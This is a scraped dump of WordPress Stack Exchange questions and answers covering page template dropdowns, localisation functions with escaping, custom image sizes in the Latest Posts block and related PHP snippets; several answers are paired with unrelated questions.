"selected": true,
"text": "<p>You can use the Gutenberg Block Template it is used to have a content placeholder for your Gutenberg content.</p>\n<p><a href=\"https://developer.wordpress.org/block-editor/developers/block-api/block-templates/\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/block-editor/developers/block-api/block-templates/</a></p>\n<pre><code><?php\nfunction myplugin_register_template() {\n $post_type_object = get_post_type_object( 'post' );\n $post_type_object->template = array(\n array( 'core/image' ),\n );\n}\nadd_action( 'init', 'myplugin_register_template' );\n</code></pre>\n"
}
] | 2020/09/25 | [
"https://wordpress.stackexchange.com/questions/375459",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/195197/"
] | I have special roles on my site.
I use easy digital download.
My user has access to the download page. I want the metabox not to see the number of sales.
Can I hide this metabox for this role or user?
Of course, now that I had to, I deleted it with CSS (`display : none`)
Thank you in advance for your guidance. | You can use the Gutenberg Block Template it is used to have a content placeholder for your Gutenberg content.
<https://developer.wordpress.org/block-editor/developers/block-api/block-templates/>
```
<?php
function myplugin_register_template() {
$post_type_object = get_post_type_object( 'post' );
$post_type_object->template = array(
array( 'core/image' ),
);
}
add_action( 'init', 'myplugin_register_template' );
``` |
375,473 | <p>I checked everything suggested in <a href="https://wordpress.stackexchange.com/questions/184104/page-editor-missing-templates-drop-down">that response</a>: "page attributes" option is checked, template file is located at theme root folder, I tried several file encoding options in my text editor (UTF8 with or without BOM), I tried switching to another theme then back to my custom theme, I do have the right stuff on top:</p>
<pre><code><?php
/*
Template Name: Page Actualites
*/
?>
</code></pre>
<p>Why am I still not seeing the page template dropdown list?</p>
| [
{
"answer_id": 375475,
"author": "bueltge",
"author_id": 170,
"author_profile": "https://wordpress.stackexchange.com/users/170",
"pm_score": 0,
"selected": false,
"text": "<p>The <a href=\"https://developer.wordpress.org/themes/template-files-section/page-template-files/#creating-custom-page-templates-for-global-use\" rel=\"nofollow noreferrer\">documentation</a> of the feature is really good. So check them, especially the name of the file, also the rights of the file via FTP or ssh - is it readable.</p>\n<p>Do not use <code>page-</code> as a prefix, as WordPress will interpret the file as a specialized template, meant to apply to only one page on your site.</p>\n<p>Remove also the PHP close tag, not necessary and often more problematic.</p>\n"
},
{
"answer_id": 375478,
"author": "drake035",
"author_id": 11634,
"author_profile": "https://wordpress.stackexchange.com/users/11634",
"pm_score": 2,
"selected": true,
"text": "<p>The page was set as the posts page in <code>settings > reading</code>, which prevents from chosing a specific page template since this setting automatically assigns <code>index.php</code> as the page template for that page.</p>\n"
},
{
"answer_id": 392225,
"author": "Monisha",
"author_id": 209217,
"author_profile": "https://wordpress.stackexchange.com/users/209217",
"pm_score": 0,
"selected": false,
"text": "<p>Wordpress 5.8 introduced template editor: <a href=\"https://make.wordpress.org/core/2021/06/16/introducing-the-template-editor-in-wordpress-5-8/\" rel=\"nofollow noreferrer\">https://make.wordpress.org/core/2021/06/16/introducing-the-template-editor-in-wordpress-5-8/</a></p>\n"
},
{
"answer_id": 401591,
"author": "Subrata",
"author_id": 145648,
"author_profile": "https://wordpress.stackexchange.com/users/145648",
"pm_score": 1,
"selected": false,
"text": "<p>Had the same issue when I reinstalled wordpress, realized I haven't activated the theme on which my templates are.</p>\n<p><strong>So make sure you enabled your theme.</strong></p>\n<p>Gosh, i forget this everytime :x</p>\n"
}
] | 2020/09/26 | [
"https://wordpress.stackexchange.com/questions/375473",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/11634/"
] | I checked everything suggested in [that response](https://wordpress.stackexchange.com/questions/184104/page-editor-missing-templates-drop-down): "page attributes" option is checked, template file is located at theme root folder, I tried several file encoding options in my text editor (UTF8 with or without BOM), I tried switching to another theme then back to my custom theme, I do have the right stuff on top:
```
<?php
/*
Template Name: Page Actualites
*/
?>
```
Why am I still not seeing the page template dropdown list? | The page was set as the posts page in `settings > reading`, which prevents from chosing a specific page template since this setting automatically assigns `index.php` as the page template for that page. |
375,547 | <p>I need to change the timeformat in this column</p>
<p><a href="https://i.stack.imgur.com/huMdd.png" rel="nofollow noreferrer"><img src="https://i.stack.imgur.com/huMdd.png" alt="" /></a></p>
<p>to be in hours, not measured in seconds and minutes. This meaning that 30 minutes should be measured in 0.5 hours and so on.</p>
<p>I think I need to edit this line of code. Any suggestions on how to change the measurement to ONLY HOURS?</p>
<pre><code>return human_time_diff(strtotime($item['time_login']), strtotime($item['time_last_seen']));
</code></pre>
| [
{
"answer_id": 375475,
"author": "bueltge",
"author_id": 170,
"author_profile": "https://wordpress.stackexchange.com/users/170",
"pm_score": 0,
"selected": false,
"text": "<p>The <a href=\"https://developer.wordpress.org/themes/template-files-section/page-template-files/#creating-custom-page-templates-for-global-use\" rel=\"nofollow noreferrer\">documentation</a> of the feature is really good. So check them, especially the name of the file, also the rights of the file via FTP or ssh - is it readable.</p>\n<p>Do not use <code>page-</code> as a prefix, as WordPress will interpret the file as a specialized template, meant to apply to only one page on your site.</p>\n<p>Remove also the PHP close tag, not necessary and often more problematic.</p>\n"
},
{
"answer_id": 375478,
"author": "drake035",
"author_id": 11634,
"author_profile": "https://wordpress.stackexchange.com/users/11634",
"pm_score": 2,
"selected": true,
"text": "<p>The page was set as the posts page in <code>settings > reading</code>, which prevents from chosing a specific page template since this setting automatically assigns <code>index.php</code> as the page template for that page.</p>\n"
},
{
"answer_id": 392225,
"author": "Monisha",
"author_id": 209217,
"author_profile": "https://wordpress.stackexchange.com/users/209217",
"pm_score": 0,
"selected": false,
"text": "<p>Wordpress 5.8 introduced template editor: <a href=\"https://make.wordpress.org/core/2021/06/16/introducing-the-template-editor-in-wordpress-5-8/\" rel=\"nofollow noreferrer\">https://make.wordpress.org/core/2021/06/16/introducing-the-template-editor-in-wordpress-5-8/</a></p>\n"
},
{
"answer_id": 401591,
"author": "Subrata",
"author_id": 145648,
"author_profile": "https://wordpress.stackexchange.com/users/145648",
"pm_score": 1,
"selected": false,
"text": "<p>Had the same issue when I reinstalled wordpress, realized I haven't activated the theme on which my templates are.</p>\n<p><strong>So make sure you enabled your theme.</strong></p>\n<p>Gosh, i forget this everytime :x</p>\n"
}
] | 2020/09/28 | [
"https://wordpress.stackexchange.com/questions/375547",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/195292/"
] | I need to change the timeformat in this column
[](https://i.stack.imgur.com/huMdd.png)
to be in hours, not measured in seconds and minutes. This meaning that 30 minutes should be measured in 0.5 hours and so on.
I think I need to edit this line of code. Any suggestions on how to change the measurement to ONLY HOURS?
```
return human_time_diff(strtotime($item['time_login']), strtotime($item['time_last_seen']));
``` | The page was set as the posts page in `settings > reading`, which prevents from chosing a specific page template since this setting automatically assigns `index.php` as the page template for that page. |
375,560 | <p>Is this the correct way to translate a sting of text?</p>
<pre><code>_e( '<h2 class="title">' . $var . '</h2>', 'text-domain' );
</code></pre>
<p>or, is this?</p>
<pre><code>echo '<h2 class="title">';
_e( $var, 'text-domain' );
echo '</h2>';
</code></pre>
<p>or this?</p>
<pre><code>printf( __( '<h2 class="title">%s</h2>', 'text-domain' ), $var );
</code></pre>
<p><strong>Edit:</strong> Update or this?</p>
<pre><code>printf( '<h2 class="title">%s</h2>', esc_html__( $var, 'text-domain' ) );
</code></pre>
| [
{
"answer_id": 375562,
"author": "DaFois",
"author_id": 108884,
"author_profile": "https://wordpress.stackexchange.com/users/108884",
"pm_score": 1,
"selected": false,
"text": "<ul>\n<li>Both of the functions are used in the localisation of wordpress themes.</li>\n<li>Both are used to display static strings/text.</li>\n</ul>\n<p>The major difference is that <code>_e()</code> echoes but <code>__()</code> returns the correctly localised text.</p>\n<p><strong>_e() function</strong></p>\n<pre class=\"lang-php prettyprint-override\"><code>_e( 'text', 'domain' )\n</code></pre>\n<p>The above is the general syntax for <code>_e</code> function, <code>text</code> denotes the text and the <code>domain</code> is the text domain of the theme loaded via <code>load_theme_text_domain</code> function.</p>\n<pre class=\"lang-php prettyprint-override\"><code>load_theme_textdomain( 'domain', $path )\n</code></pre>\n<p>Domain denotes the domain name, say the name of the theme and path is the path of the languages directory(where the pot file for localisation resides). The every instance of <code>_e</code> with the loaded text domain gets translated.</p>\n<p><strong>__() function</strong></p>\n<pre class=\"lang-php prettyprint-override\"><code>$localised_string = __( 'text', 'domain' );\n</code></pre>\n<p>Here the <code>$localised_string</code> variable holds the localised value of the text, the <code>__()</code>function returns the localised value instead of echoing it (whereas the <code>__e()</code> function does ).</p>\n"
},
{
"answer_id": 375563,
"author": "Tom J Nowell",
"author_id": 736,
"author_profile": "https://wordpress.stackexchange.com/users/736",
"pm_score": 3,
"selected": true,
"text": "<p><strong>None of them are correct</strong>. These APIs are not intended for dynamic data or content from the database.</p>\n<p>This would be the best practice answer:</p>\n<pre class=\"lang-php prettyprint-override\"><code>echo '<h2 class="title">';\nesc_html_e( 'static string', 'text-domain' );\necho '</h2>';\n</code></pre>\n<p><em><strong>If you want to translate posts and other database user entered content, use a translation plugin, not the localisation API.</strong></em> There are many very popular plugins to do this, each with their own tradeoffs based on how you want localisation to work for your site.</p>\n<h2>But Why?</h2>\n<p><em><strong>You should never use variables as the first parameter of a localisation API call.</strong></em></p>\n<p>Aside from being extreme bad practice, it means the string will not get picked up by tools, so it's impossible to generate translation files to translaters.</p>\n<p>It does not matter how you pass <code>$var</code> to the function, it will always be incorrect. Do not pass variables to localisation functions in WordPress. <strong>These functions are intended for static strings, not dynamic values.</strong></p>\n<p>If you want to localise content from the database, this API is not the way to do it.</p>\n<h3>HTML tags</h3>\n<p>Localised strings shouldn't include H2 tags and other HTML tags, but instead provide the text content that goes in those tags. There are rare cases when you do, in which case <code>__()</code> and <code>wp_kses_post</code> or <code>sprintf</code> can be useful.</p>\n<h3><code>_e()</code> vs <code>__()</code></h3>\n<p><code>_e()</code> is equivalent to <code>echo __()</code></p>\n<h3>Why are <code>_e</code> and <code>__</code> wrong?</h3>\n<p>Because neither do escaping.</p>\n<p>This is the canonical correct answer:</p>\n<pre class=\"lang-php prettyprint-override\"><code>echo '<h2 class="title">';\nesc_html_e( 'static string', 'text-domain' );\necho '</h2>';\n</code></pre>\n<p><code>esc_html_e(</code> is shorthand for <code>echo esc_html( __(</code>. We know that inside the H2 tag there will be text, but no tags, so we use <code>esc_html</code> to escape any HTML that appears</p>\n<p>If this were an attribute of a tag, then it would be <code>attribute="<?php esc_attr_e(...); ?>"</code></p>\n<p>So then, why does <code>__(</code> etc exist? Because escaping has to happen as late as possible, and only once. Otherwise we run the risk of double escaping strings.</p>\n<h3>Fixing The <code>printf</code> example</h3>\n<p>We can escape the localised string prior to passing it to <code>printf</code> allowing it to be escaped:</p>\n<pre class=\"lang-php prettyprint-override\"><code>printf( '<h2 class="title">%s</h2>', esc_html__( 'static string','text-domain' ) );\n</code></pre>\n<h2>So How Do You Translate Dynamic Content?</h2>\n<p>If you want to enable posts/terms/titles/etc in multiple languages, you need a translation plugin. The i18n APIs are for hardcoded static strings, not database or generated content.</p>\n"
}
] | 2020/09/28 | [
"https://wordpress.stackexchange.com/questions/375560",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/104464/"
] | Is this the correct way to translate a sting of text?
```
_e( '<h2 class="title">' . $var . '</h2>', 'text-domain' );
```
or, is this?
```
echo '<h2 class="title">';
_e( $var, 'text-domain' );
echo '</h2>';
```
or this?
```
printf( __( '<h2 class="title">%s</h2>', 'text-domain' ), $var );
```
**Edit:** Update or this?
```
printf( '<h2 class="title">%s</h2>', esc_html__( $var, 'text-domain' ) );
``` | **None of them are correct**. These APIs are not intended for dynamic data or content from the database.
This would be the best practice answer:
```php
echo '<h2 class="title">';
esc_html_e( 'static string', 'text-domain' );
echo '</h2>';
```
***If you want to translate posts and other database user entered content, use a translation plugin, not the localisation API.*** There are many very popular plugins to do this, each with their own tradeoffs based on how you want localisation to work for your site.
But Why?
--------
***You should never use variables as the first parameter of a localisation API call.***
Aside from being extreme bad practice, it means the string will not get picked up by tools, so it's impossible to generate translation files to translaters.
It does not matter how you pass `$var` to the function, it will always be incorrect. Do not pass variables to localisation functions in WordPress. **These functions are intended for static strings, not dynamic values.**
If you want to localise content from the database, this API is not the way to do it.
### HTML tags
Localised strings shouldn't include H2 tags and other HTML tags, but instead provide the text content that goes in those tags. There are rare cases when you do, in which case `__()` and `wp_kses_post` or `sprintf` can be useful.
### `_e()` vs `__()`
`_e()` is equivalent to `echo __()`
### Why are `_e` and `__` wrong?
Because neither do escaping.
This is the canonical correct answer:
```php
echo '<h2 class="title">';
esc_html_e( 'static string', 'text-domain' );
echo '</h2>';
```
`esc_html_e(` is shorthand for `echo esc_html( __(`. We know that inside the H2 tag there will be text, but no tags, so we use `esc_html` to escape any HTML that appears
If this were an attribute of a tag, then it would be `attribute="<?php esc_attr_e(...); ?>"`
So then, why does `__(` etc exist? Because escaping has to happen as late as possible, and only once. Otherwise we run the risk of double escaping strings.
### Fixing The `printf` example
We can escape the localised string prior to passing it to `printf` allowing it to be escaped:
```php
printf( '<h2 class="title">%s</h2>', esc_html__( 'static string','text-domain' ) );
```
So How Do You Translate Dynamic Content?
----------------------------------------
If you want to enable posts/terms/titles/etc in multiple languages, you need a translation plugin. The i18n APIs are for hardcoded static strings, not database or generated content. |
375,574 | <p>so I have this wordpress website <a href="https://knivesreviews.net/" rel="nofollow noreferrer">knivesreviews</a></p>
<p>I ha ve blog section there, but it really is just category. I would like to make it separate wordpress installation, but I'm afraid it will mess up my database. I want it it separate installation,because I will be adding eshop with knives to the original website and need it to be on separate database for security and other reasons. What is the easiest way how to have two installations of wordpress at one site and is it even possible?</p>
| [
{
"answer_id": 375562,
"author": "DaFois",
"author_id": 108884,
"author_profile": "https://wordpress.stackexchange.com/users/108884",
"pm_score": 1,
"selected": false,
"text": "<ul>\n<li>Both of the functions are used in the localisation of wordpress themes.</li>\n<li>Both are used to display static strings/text.</li>\n</ul>\n<p>The major difference is that <code>_e()</code> echoes but <code>__()</code> returns the correctly localised text.</p>\n<p><strong>_e() function</strong></p>\n<pre class=\"lang-php prettyprint-override\"><code>_e( 'text', 'domain' )\n</code></pre>\n<p>The above is the general syntax for <code>_e</code> function, <code>text</code> denotes the text and the <code>domain</code> is the text domain of the theme loaded via <code>load_theme_text_domain</code> function.</p>\n<pre class=\"lang-php prettyprint-override\"><code>load_theme_textdomain( 'domain', $path )\n</code></pre>\n<p>Domain denotes the domain name, say the name of the theme and path is the path of the languages directory(where the pot file for localisation resides). The every instance of <code>_e</code> with the loaded text domain gets translated.</p>\n<p><strong>__() function</strong></p>\n<pre class=\"lang-php prettyprint-override\"><code>$localised_string = __( 'text', 'domain' );\n</code></pre>\n<p>Here the <code>$localised_string</code> variable holds the localised value of the text, the <code>__()</code>function returns the localised value instead of echoing it (whereas the <code>__e()</code> function does ).</p>\n"
},
{
"answer_id": 375563,
"author": "Tom J Nowell",
"author_id": 736,
"author_profile": "https://wordpress.stackexchange.com/users/736",
"pm_score": 3,
"selected": true,
"text": "<p><strong>None of them are correct</strong>. These APIs are not intended for dynamic data or content from the database.</p>\n<p>This would be the best practice answer:</p>\n<pre class=\"lang-php prettyprint-override\"><code>echo '<h2 class="title">';\nesc_html_e( 'static string', 'text-domain' );\necho '</h2>';\n</code></pre>\n<p><em><strong>If you want to translate posts and other database user entered content, use a translation plugin, not the localisation API.</strong></em> There are many very popular plugins to do this, each with their own tradeoffs based on how you want localisation to work for your site.</p>\n<h2>But Why?</h2>\n<p><em><strong>You should never use variables as the first parameter of a localisation API call.</strong></em></p>\n<p>Aside from being extreme bad practice, it means the string will not get picked up by tools, so it's impossible to generate translation files to translaters.</p>\n<p>It does not matter how you pass <code>$var</code> to the function, it will always be incorrect. Do not pass variables to localisation functions in WordPress. <strong>These functions are intended for static strings, not dynamic values.</strong></p>\n<p>If you want to localise content from the database, this API is not the way to do it.</p>\n<h3>HTML tags</h3>\n<p>Localised strings shouldn't include H2 tags and other HTML tags, but instead provide the text content that goes in those tags. There are rare cases when you do, in which case <code>__()</code> and <code>wp_kses_post</code> or <code>sprintf</code> can be useful.</p>\n<h3><code>_e()</code> vs <code>__()</code></h3>\n<p><code>_e()</code> is equivalent to <code>echo __()</code></p>\n<h3>Why are <code>_e</code> and <code>__</code> wrong?</h3>\n<p>Because neither do escaping.</p>\n<p>This is the canonical correct answer:</p>\n<pre class=\"lang-php prettyprint-override\"><code>echo '<h2 class="title">';\nesc_html_e( 'static string', 'text-domain' );\necho '</h2>';\n</code></pre>\n<p><code>esc_html_e(</code> is shorthand for <code>echo esc_html( __(</code>. We know that inside the H2 tag there will be text, but no tags, so we use <code>esc_html</code> to escape any HTML that appears</p>\n<p>If this were an attribute of a tag, then it would be <code>attribute="<?php esc_attr_e(...); ?>"</code></p>\n<p>So then, why does <code>__(</code> etc exist? Because escaping has to happen as late as possible, and only once. Otherwise we run the risk of double escaping strings.</p>\n<h3>Fixing The <code>printf</code> example</h3>\n<p>We can escape the localised string prior to passing it to <code>printf</code> allowing it to be escaped:</p>\n<pre class=\"lang-php prettyprint-override\"><code>printf( '<h2 class="title">%s</h2>', esc_html__( 'static string','text-domain' ) );\n</code></pre>\n<h2>So How Do You Translate Dynamic Content?</h2>\n<p>If you want to enable posts/terms/titles/etc in multiple languages, you need a translation plugin. The i18n APIs are for hardcoded static strings, not database or generated content.</p>\n"
}
] | 2020/09/28 | [
"https://wordpress.stackexchange.com/questions/375574",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/195318/"
] | so I have this wordpress website [knivesreviews](https://knivesreviews.net/)
I ha ve blog section there, but it really is just category. I would like to make it separate wordpress installation, but I'm afraid it will mess up my database. I want it it separate installation,because I will be adding eshop with knives to the original website and need it to be on separate database for security and other reasons. What is the easiest way how to have two installations of wordpress at one site and is it even possible? | **None of them are correct**. These APIs are not intended for dynamic data or content from the database.
This would be the best practice answer:
```php
echo '<h2 class="title">';
esc_html_e( 'static string', 'text-domain' );
echo '</h2>';
```
***If you want to translate posts and other database user entered content, use a translation plugin, not the localisation API.*** There are many very popular plugins to do this, each with their own tradeoffs based on how you want localisation to work for your site.
But Why?
--------
***You should never use variables as the first parameter of a localisation API call.***
Aside from being extreme bad practice, it means the string will not get picked up by tools, so it's impossible to generate translation files to translaters.
It does not matter how you pass `$var` to the function, it will always be incorrect. Do not pass variables to localisation functions in WordPress. **These functions are intended for static strings, not dynamic values.**
If you want to localise content from the database, this API is not the way to do it.
### HTML tags
Localised strings shouldn't include H2 tags and other HTML tags, but instead provide the text content that goes in those tags. There are rare cases when you do, in which case `__()` and `wp_kses_post` or `sprintf` can be useful.
### `_e()` vs `__()`
`_e()` is equivalent to `echo __()`
### Why are `_e` and `__` wrong?
Because neither do escaping.
This is the canonical correct answer:
```php
echo '<h2 class="title">';
esc_html_e( 'static string', 'text-domain' );
echo '</h2>';
```
`esc_html_e(` is shorthand for `echo esc_html( __(`. We know that inside the H2 tag there will be text, but no tags, so we use `esc_html` to escape any HTML that appears
If this were an attribute of a tag, then it would be `attribute="<?php esc_attr_e(...); ?>"`
So then, why does `__(` etc exist? Because escaping has to happen as late as possible, and only once. Otherwise we run the risk of double escaping strings.
### Fixing The `printf` example
We can escape the localised string prior to passing it to `printf` allowing it to be escaped:
```php
printf( '<h2 class="title">%s</h2>', esc_html__( 'static string','text-domain' ) );
```
So How Do You Translate Dynamic Content?
----------------------------------------
If you want to enable posts/terms/titles/etc in multiple languages, you need a translation plugin. The i18n APIs are for hardcoded static strings, not database or generated content. |
375,600 | <p>I like the gutenberg "latest posts" block. The problem I have with it is that it doesn't hardcrop images that users upload to the posts. Is there a way to choose a hard-cropped or custom size that I have created through the <code>add_image_size()</code> function?</p>
<p>I don't really have any code, but I think this question is on topic because it's purely about wordpress core. I'm sorry if it isn't!</p>
<p>What I have used to create my custom image size is this though:</p>
<pre><code>add_action( 'after_setup_theme', 'aeroleds_image_sizes' );
function aeroleds_image_sizes() {
add_image_size( 'banner-image', 400, 300, true ); // (cropped)
}
</code></pre>
| [
{
"answer_id": 375601,
"author": "Paul",
"author_id": 195289,
"author_profile": "https://wordpress.stackexchange.com/users/195289",
"pm_score": 1,
"selected": false,
"text": "<p>it looks like you have to also pass your custom image thumbnail sizes to the filter <code>image_size_names_choose</code>. I tried it and this works for displaying custom images sizes as choices in the latest posts dropdown:</p>\n<pre><code>add_filter('image_size_names_choose', function( $sizes ){\n return array_merge( $sizes, [ 'banner-image' => 'banner image' ] );\n});\n</code></pre>\n<p>This blog explains a similar issue, so I tried his suggestion.\n<a href=\"https://talhasariyuerek.com/en/show-all-image-sizes-in-gutenberg-mediaupload-wordpress/\" rel=\"nofollow noreferrer\">https://talhasariyuerek.com/en/show-all-image-sizes-in-gutenberg-mediaupload-wordpress/</a></p>\n<p>And by the way, the Gutenberg component that controls that dropdown is <a href=\"https://github.com/WordPress/gutenberg/tree/master/packages/block-editor/src/components/image-size-control\" rel=\"nofollow noreferrer\">https://github.com/WordPress/gutenberg/tree/master/packages/block-editor/src/components/image-size-control</a></p>\n"
},
{
"answer_id": 375604,
"author": "Sally CJ",
"author_id": 137402,
"author_profile": "https://wordpress.stackexchange.com/users/137402",
"pm_score": 3,
"selected": true,
"text": "<p>The Latest Posts block uses (<code>wp.data.select( 'core/block-editor' ).getSettings()</code> to get) the image sizes in the editor settings which can be filtered via the <a href=\"https://developer.wordpress.org/reference/hooks/block_editor_settings/\" rel=\"nofollow noreferrer\"><code>block_editor_settings</code> hook</a> in PHP:</p>\n<blockquote>\n<p><code>apply_filters( 'block_editor_settings', array $editor_settings, WP_Post $post )</code></p>\n<p>Filters the settings to pass to the block editor.</p>\n</blockquote>\n<p>And the setting name used for the image sizes is <code>imageSizes</code>.</p>\n<p>So for example, to make the custom <code>banner-image</code> size be available in the featured image size dropdown (in the Latest Posts block's settings):</p>\n<pre class=\"lang-php prettyprint-override\"><code>add_filter( 'block_editor_settings', 'wpse_375600' );\nfunction wpse_375600( $editor_settings ) {\n $editor_settings['imageSizes'][] = [\n 'slug' => 'banner-image',\n 'name' => 'Banner Image',\n ];\n\n return $editor_settings;\n}\n</code></pre>\n<p>And in addition to that the filter being specific to the block editor, your callback can also get access to the post being edited, which is the second parameter (<code>$post</code>) in the filter hook as you can see above. So you could for example filter the settings only for certain posts.</p>\n<p><strong>Resources:</strong></p>\n<ul>\n<li><p><a href=\"https://github.com/WordPress/gutenberg/tree/master/packages/block-library/src/latest-posts\" rel=\"nofollow noreferrer\">The Latest Posts block on GitHub</a></p>\n</li>\n<li><p><a href=\"https://developer.wordpress.org/block-editor/data/data-core-block-editor/#getSettings\" rel=\"nofollow noreferrer\">The Block Editor's Data » <code>getSettings()</code></a></p>\n</li>\n<li><p><a href=\"https://developer.wordpress.org/block-editor/developers/filters/editor-filters/#editor-settings\" rel=\"nofollow noreferrer\">Editor Filters » Editor Settings</a></p>\n</li>\n</ul>\n"
}
] | 2020/09/29 | [
"https://wordpress.stackexchange.com/questions/375600",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/105668/"
] | I like the gutenberg "latest posts" block. The problem I have with it is that it doesn't hardcrop images that users upload to the posts. Is there a way to choose a hard-cropped or custom size that I have created through the `add_image_size()` function?
I don't really have any code, but I think this question is on topic because it's purely about wordpress core. I'm sorry if it isn't!
What I have used to create my custom image size is this though:
```
add_action( 'after_setup_theme', 'aeroleds_image_sizes' );
function aeroleds_image_sizes() {
add_image_size( 'banner-image', 400, 300, true ); // (cropped)
}
``` | The Latest Posts block uses (`wp.data.select( 'core/block-editor' ).getSettings()` to get) the image sizes in the editor settings which can be filtered via the [`block_editor_settings` hook](https://developer.wordpress.org/reference/hooks/block_editor_settings/) in PHP:
>
> `apply_filters( 'block_editor_settings', array $editor_settings, WP_Post $post )`
>
>
> Filters the settings to pass to the block editor.
>
>
>
And the setting name used for the image sizes is `imageSizes`.
So for example, to make the custom `banner-image` size be available in the featured image size dropdown (in the Latest Posts block's settings):
```php
add_filter( 'block_editor_settings', 'wpse_375600' );
function wpse_375600( $editor_settings ) {
$editor_settings['imageSizes'][] = [
'slug' => 'banner-image',
'name' => 'Banner Image',
];
return $editor_settings;
}
```
And in addition to that the filter being specific to the block editor, your callback can also get access to the post being edited, which is the second parameter (`$post`) in the filter hook as you can see above. So you could for example filter the settings only for certain posts.
**Resources:**
* [The Latest Posts block on GitHub](https://github.com/WordPress/gutenberg/tree/master/packages/block-library/src/latest-posts)
* [The Block Editor's Data » `getSettings()`](https://developer.wordpress.org/block-editor/data/data-core-block-editor/#getSettings)
* [Editor Filters » Editor Settings](https://developer.wordpress.org/block-editor/developers/filters/editor-filters/#editor-settings) |
375,624 | <p>I use this query to call posts from a custom-type post I setup apart</p>
<pre><code>$args = array( 'posts_per_page' => 5, 'order'=> 'DES', 'post_type' => 'custom-post' );
$myposts = get_posts( $args );
foreach ( $myposts as $post ) : setup_postdata( $post ); ?>
<div class="thumbnail">
<?php echo get_the_post_thumbnail( $post->ID, 'thumbnail' ); ?>
</div>
<?php the_title( sprintf( '<h2><a href="%s">', esc_url( get_permalink() ) ),'</a></h2>' ); ?>
<?php echo '<p>' . get_the_excerpt() . '</p>' ?>
<?php endforeach;
wp_reset_postdata();
</code></pre>
<p>Two questions:</p>
<ol>
<li>Is that correct or can I improve it better somehow?</li>
<li>Is it possible to call posts that are placed <strong>both</strong> in 2 different taxonomy generated from that custom post type ("flowers" and "colors" for instance) and then call post that is in the "flowers" category but <strong>not</strong> in the "colors" one?</li>
</ol>
<p>Thank you</p>
| [
{
"answer_id": 375601,
"author": "Paul",
"author_id": 195289,
"author_profile": "https://wordpress.stackexchange.com/users/195289",
"pm_score": 1,
"selected": false,
"text": "<p>it looks like you have to also pass your custom image thumbnail sizes to the filter <code>image_size_names_choose</code>. I tried it and this works for displaying custom images sizes as choices in the latest posts dropdown:</p>\n<pre><code>add_filter('image_size_names_choose', function( $sizes ){\n return array_merge( $sizes, [ 'banner-image' => 'banner image' ] );\n});\n</code></pre>\n<p>This blog explains a similar issue, so I tried his suggestion.\n<a href=\"https://talhasariyuerek.com/en/show-all-image-sizes-in-gutenberg-mediaupload-wordpress/\" rel=\"nofollow noreferrer\">https://talhasariyuerek.com/en/show-all-image-sizes-in-gutenberg-mediaupload-wordpress/</a></p>\n<p>And by the way, the Gutenberg component that controls that dropdown is <a href=\"https://github.com/WordPress/gutenberg/tree/master/packages/block-editor/src/components/image-size-control\" rel=\"nofollow noreferrer\">https://github.com/WordPress/gutenberg/tree/master/packages/block-editor/src/components/image-size-control</a></p>\n"
},
{
"answer_id": 375604,
"author": "Sally CJ",
"author_id": 137402,
"author_profile": "https://wordpress.stackexchange.com/users/137402",
"pm_score": 3,
"selected": true,
"text": "<p>The Latest Posts block uses (<code>wp.data.select( 'core/block-editor' ).getSettings()</code> to get) the image sizes in the editor settings which can be filtered via the <a href=\"https://developer.wordpress.org/reference/hooks/block_editor_settings/\" rel=\"nofollow noreferrer\"><code>block_editor_settings</code> hook</a> in PHP:</p>\n<blockquote>\n<p><code>apply_filters( 'block_editor_settings', array $editor_settings, WP_Post $post )</code></p>\n<p>Filters the settings to pass to the block editor.</p>\n</blockquote>\n<p>And the setting name used for the image sizes is <code>imageSizes</code>.</p>\n<p>So for example, to make the custom <code>banner-image</code> size be available in the featured image size dropdown (in the Latest Posts block's settings):</p>\n<pre class=\"lang-php prettyprint-override\"><code>add_filter( 'block_editor_settings', 'wpse_375600' );\nfunction wpse_375600( $editor_settings ) {\n $editor_settings['imageSizes'][] = [\n 'slug' => 'banner-image',\n 'name' => 'Banner Image',\n ];\n\n return $editor_settings;\n}\n</code></pre>\n<p>And in addition to that the filter being specific to the block editor, your callback can also get access to the post being edited, which is the second parameter (<code>$post</code>) in the filter hook as you can see above. So you could for example filter the settings only for certain posts.</p>\n<p><strong>Resources:</strong></p>\n<ul>\n<li><p><a href=\"https://github.com/WordPress/gutenberg/tree/master/packages/block-library/src/latest-posts\" rel=\"nofollow noreferrer\">The Latest Posts block on GitHub</a></p>\n</li>\n<li><p><a href=\"https://developer.wordpress.org/block-editor/data/data-core-block-editor/#getSettings\" rel=\"nofollow noreferrer\">The Block Editor's Data » <code>getSettings()</code></a></p>\n</li>\n<li><p><a href=\"https://developer.wordpress.org/block-editor/developers/filters/editor-filters/#editor-settings\" rel=\"nofollow noreferrer\">Editor Filters » Editor Settings</a></p>\n</li>\n</ul>\n"
}
] | 2020/09/29 | [
"https://wordpress.stackexchange.com/questions/375624",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/195370/"
] | I use this query to call posts from a custom-type post I setup apart
```
$args = array( 'posts_per_page' => 5, 'order'=> 'DES', 'post_type' => 'custom-post' );
$myposts = get_posts( $args );
foreach ( $myposts as $post ) : setup_postdata( $post ); ?>
<div class="thumbnail">
<?php echo get_the_post_thumbnail( $post->ID, 'thumbnail' ); ?>
</div>
<?php the_title( sprintf( '<h2><a href="%s">', esc_url( get_permalink() ) ),'</a></h2>' ); ?>
<?php echo '<p>' . get_the_excerpt() . '</p>' ?>
<?php endforeach;
wp_reset_postdata();
```
Two questions:
1. Is that correct or can I improve it better somehow?
2. Is it possible to call posts that are placed **both** in 2 different taxonomy generated from that custom post type ("flowers" and "colors" for instance) and then call post that is in the "flowers" category but **not** in the "colors" one?
Thank you | The Latest Posts block uses (`wp.data.select( 'core/block-editor' ).getSettings()` to get) the image sizes in the editor settings which can be filtered via the [`block_editor_settings` hook](https://developer.wordpress.org/reference/hooks/block_editor_settings/) in PHP:
>
> `apply_filters( 'block_editor_settings', array $editor_settings, WP_Post $post )`
>
>
> Filters the settings to pass to the block editor.
>
>
>
And the setting name used for the image sizes is `imageSizes`.
So for example, to make the custom `banner-image` size be available in the featured image size dropdown (in the Latest Posts block's settings):
```php
add_filter( 'block_editor_settings', 'wpse_375600' );
